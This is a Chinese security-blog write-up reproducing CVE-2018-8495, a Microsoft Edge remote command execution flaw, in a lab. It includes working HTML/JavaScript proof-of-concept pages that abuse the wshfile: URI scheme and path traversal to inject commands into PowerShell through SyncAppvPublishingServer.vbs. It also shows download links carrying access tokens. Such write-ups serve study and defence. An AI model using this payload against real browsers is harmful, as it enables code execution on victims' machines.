freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Microsoft Edge 远程命令执行漏洞学习(CVE-2018-8495)
2024-08-07 00:30:44

1722961709_66b24f2d44d9a0533d727.jpg!small

软件介绍:

Microsoft Edge是微软基于Chromium 开源项目及其他开源软件开发的网页浏览器。

漏洞概述:

攻击者可以利用该漏洞,通过Microsoft Edge浏览器在远程计算机上运行恶意代码

影响版本:

Windows Edge/IE 11,主要是windows 系统自带的Edge,具体如下:

Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows 10 Version 1703 for x64-based Systems
Windows 10 Version 1703 for 32-bit Systems
Windows 10 Version 1709 for 32-bit Systems
Windows 10 Version 1709 for 64-based Systems
Windows Server, version 1709 (Server Core Installation)
Windows 10 Version 1803 for 32-bit Systems
Windows 10 Version 1803 for x64-based Systems
Windows Server, version 1803 (Server Core Installation)

搭建靶场:

本次使用windows 虚拟机cn_windows_10_multi-edition_version_1709_updated_dec_2017_x64_dvd_100406696 作为靶机,下载地址如下:

https://clemon.sharepoint.com/sites/MSDN/_layouts/15/download.aspx?UniqueId=066ca4a3-6d4a-56f1-bb96-c428718d729f&Translate=false&tempauth=v1.eyJzaXRlaWQiOiI4OWIwZTVlNS0yYjVmLTRiMmMtOTI3ZS0zYWI4MWQzNzFlNzAiLCJhcHBfZGlzcGxheW5hbWUiOiJPbmVNYW5hZ2VyIiwiYXBwaWQiOiI3MzRlZjkyOC1kNzRjLTQ1NTUtOGQxYi1kOTQyZmEwYTFhNDEiLCJhdWQiOiIwMDAwMDAwMy0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAvY2xlbW9uLnNoYXJlcG9pbnQuY29tQGZlODdiNjYzLTg5MDktNDJkYi05YWVhLTk2ZjJkZWM1NmNkMCIsImV4cCI6IjE3MjI4MjM0MjQifQ.CgoKBHNuaWQSAjY0EgsIvr30yo-9mj0QBRoOMjAuMTkwLjE0NC4xNjkqLDBRNGNxSFlxWHZlR2dWWStlNmZORGlDV1p3YVpGSEtmYlBxTjNwZEdqVm89MIABOAFCEKFDI9JDEAAwjMR6PHpIDbBKEGhhc2hlZHByb29mdG9rZW5yKTBoLmZ8bWVtYmVyc2hpcHwxMDAzMjAwMjkxZTVlM2MxQGxpdmUuY29tegEyggESCWO2h_4JidtCEZrqlvLexWzQkgEEWElZVZoBBENIRU6iARpjeHlAY2xlbW9uLm9ubWljcm9zb2Z0LmNvbaoBEDEwMDMyMDAyOTFFNUUzQzGyAR1hbGxmaWxlcy53cml0ZSBhbGxzaXRlcy53cml0ZcgBAQ.9b36lqNQ5rjIMbeVmv9s8qjR9mJoJpdUGERw7hiabQ0&ApiVersion=2.0

下载完成之后,使用vmware 创建虚拟机,设置网络为仅主机模式。防止联网,造成浏览器更新。

1722960595_66b24ad301bbde1001c9f.png!small

搭建完成,如下:

1722960608_66b24ae07604a838c7878.png!small

1722960615_66b24ae72f17a000c18b7.png!small

漏洞复现:

(CVE-2018-8495)漏洞原因主要是 Microsoft Edge 滥用自定义URI方案,参数过滤存在问题从而实现了远程代码执行。

样例,Microsoft Edge 启动默认邮件客户端。

在一些网页中,头像下面是有一个邮件的按钮的,点击就可以启动默认邮件客户端来发送邮件。
我们也可以通过类似”mailto:xxx@qq.com“的URL来启动本地的默认邮件客户端。在Edge中,输入类似的URL将出现提示:“‘Microsoft Edge’正在尝试打开‘邮件’”,询问用户是否切换应用。

1722960690_66b24b326c84344792b1b.png!small

1722960696_66b24b38b3d02bcc8468b.png!small

1722960704_66b24b40b5ade7728f3fe.png!small

如下图所示,某些参数将发送给Outlook。然而这些参数,是可由用户控制的字符串来进行更改的

1722960716_66b24b4cba8d84a5ebe91.png!small

因此,也就产生了问题,Microsoft Edge 还有哪些外部应用程序启动URI方案?根据漏洞纰漏,在注册表中,可以找到所有可以使用的注册自定义协议,注册表 计算机\HKEY_CLASSES_ROOT\ 内包含shell\open\command子文件夹的子项。然后,作者找到了 计算机\HKEY_CLASSES_ROOT\ms-word\shell\open\command 这个注册表项,它的值为 C:\Program Files (x86)\Microsoft Office\root\Office16\protocolhandler.exe "%1"。这指向Office16文件夹内一个名为protocolhandler.exe的可执行程序,%1表示直接将参数进行传递,这意味着如果我们有一个用户点击一个URL标记,指向’ms-word:test’,将会启动该程序,然后发生以下情况:

1722960739_66b24b630874d67bc267f.png!small

作者没有去尝试其他的命令行参数来启动’protocolhandler.exe’进而实现一些有趣的攻击方法。他找到 计算机\HKEY_CLASSES_ROOT\WSHFile\Shell\Open\Command 这个子项,如图所示:

1722960752_66b24b709757adadb7fde.png!small

Windows脚本宿主提供了一个环境,用户可以使用各种语言执行脚本,使用各种对象模型来执行任务,这可以将用户构造好的参数通过URI方案直接传递给’WScript.exe’。原文中讲到:如果用户点击”wshfile:test”,Edge 将会弹出提示,问用户是否选择”Microsoft @ Windows Script Host”打开此wshfile。

1722960770_66b24b824f5a835f914da.png!small

回车

1722960782_66b24b8e8e8253990e635.png!small

1722960788_66b24b94e68594ec1ef8f.png!small

提示该文件不存在。我们可以创建一个名为”wshfile:test”的文件吗?Windows系统中文件名是不能有冒号的,所以,不可行。通过路径穿越测试如下:

wshfile:test/../../foo.vbs

1722960819_66b24bb347e9c3be9c3b7.png!small

1722960826_66b24bba327147206c313.png!small

发现提示改变了,这说明我们可以指向任何目录中的任何文件,只要我们可以将文件放在可预测的位置,我们就会有RCE。但是,看起来大多数(如果不是所有)来自Edge的缓存文件都会进入临时目录位置(目录名通常为某个hash值)。换句话说,我们可以写入文件,但是我们还不能得知该文件的位置。

作者想到了一篇文章:WSH注射:案例研究

https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/

在这篇文章中,指出Windows附带了一个签名的VBS ‘C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs’ 遭受’WSH注入’的困扰。这表明特定的VBS文件可以接收传递给它的2个参数,这些参数可以精心设计,以使其可以欺骗VBS脚本执行任意命令。这篇文章写在2017年9月3号,漏洞已经修复,唯一受影响的是尚未更新的计算机。所以这还没有用,该文章中提到有更多这样的案例存在但没有具体说明,因此作者开始寻找类似的案例。
作者首先查看了我在Windows中找到的每个VBS文件,然后查看它是否接受任何参数。他发现一个VBS脚本:

C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.17134.48_none_c60426fea249fc02\SyncAppvPublishingServer.vbs

这个特定的脚本接受一些参数并将它们传递给powershell.exe shell执行而不过滤它,允许我们注入任意命令。如果你看看’SyncAppvPublishingServer.vbs’的第36行,我们看到:

psCmd = “powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command&{”&syncCmd&“}”

‘syncCmd’、Edge都不会对引号进行过滤,因此我们可以根据需要传递尽可能多的参数’WScript.exe’。同样为了将这个powershell隐藏执行,可以使用’-WindowStyle Hidden’这个参数。

此版本中的问题是此特定文件夹名称取决于用户所在的Windows构建。在我的操作系统版本17134中,该文件夹包含’10 .0.17134’,如果您使用的是其他操作系统,则它将不同。

根据提示,漏洞发现者给出的poc 如下:

<a id="q" href='wshfile:test/../../WinSxS/AMD921~1.48_/SyncAppvPublishingServer.vbs" test test;calc;"'>test</a>
<script>
window.onkeydown=e=>{
    window.onkeydown=z={};
    q.click()
}
</script>

因此,第一步,我们在C:\Windows\WinSxS 路径下搜索SyncAppvPublishingServer.vbs

1722960954_66b24c3a605a404cdf7ce.png!small

发现 C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.16299.98_none_ef3e42793963ac4c\SyncAppvPublishingServer.vbs 符合要求

因此,接下来修改 poc.html 如下:

<a id="q" href='wshfile:test/../../WinSxS/amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.16299.98_none_ef3e42793963ac4c/SyncAppvPublishingServer.vbs" test test;calc;"'>test</a>

<script>
window.onkeydown=e=>{
	window.onkeydown=z={};
	q.click()
}
</script>

在poc.html 所在的目录下,开启一个http服务

python -m http.server 80

1722961009_66b24c71e0fc04522a19e.png!small

1722961016_66b24c78b205edf98928c.png!small

使用靶机访问:poc.html

1722961030_66b24c86547bc7873a540.png!small

1722961035_66b24c8ba9671b155b286.png!small

点击test

1722961046_66b24c96eb60a8f35041d.png!small

弹出计算器

1722961053_66b24c9d6d8059915512f.png!small

但是作者说在Windows文件夹中有一个名为“DOS PATH”的速记版本,所以猜测文件夹位置的DOS路径版本是可能的。
所以,我们的不需要猜测完整路径。因此作者给出的路径如下:

C:\Windows\WinSxS\AMD921~1.48_\SyncAppvPublishingServer.vbs

查找资料:

在 Windows 中,文件系统支持长文件名(LFN),但为了兼容旧版系统,Windows 也提供了短文件名(8.3 文件名格式)。这种格式是 DOS 时代的遗产,用于表示文件和文件夹的短文件名。短文件名格式通常只有 8 个字符用于文件名和 3 个字符用于扩展名。

本次复现查找DOS PATH,在C:\Windows\WinSxS 路径下,执行如下脚本查找匹配的短文件名

dir /x |findstr "amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.16299.98_none_ef3e42793963ac4c"

1722961126_66b24ce619c35c3e104e4.png!small

因此我们的POC 还能改变成如下:

<a id="q" href='wshfile:test/../../WinSxS/AM2E5D~1.98_/SyncAppvPublishingServer.vbs" test test;calc;"'>test</a>

<script>
window.onkeydown=e=>{
	window.onkeydown=z={};
	q.click()
}
</script>

1722961150_66b24cfe262d5940028fc.png!small

1722961156_66b24d04c2c0a156ddd8c.png!small

1722961162_66b24d0a1bef036e9b69c.png!small

后续使用了cn_windows_10_business_edition_version_1803_updated_aug_2018_x64_dvd_57e5b984系统

https://clemon.sharepoint.com/sites/MSDN/_layouts/15/download.aspx?UniqueId=257450e7-aa82-5665-8b14-5eaa3f30e1b1&Translate=false&tempauth=v1.eyJzaXR
# 漏洞 # 渗透测试 # 网络安全 # web安全 # 漏洞分析
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者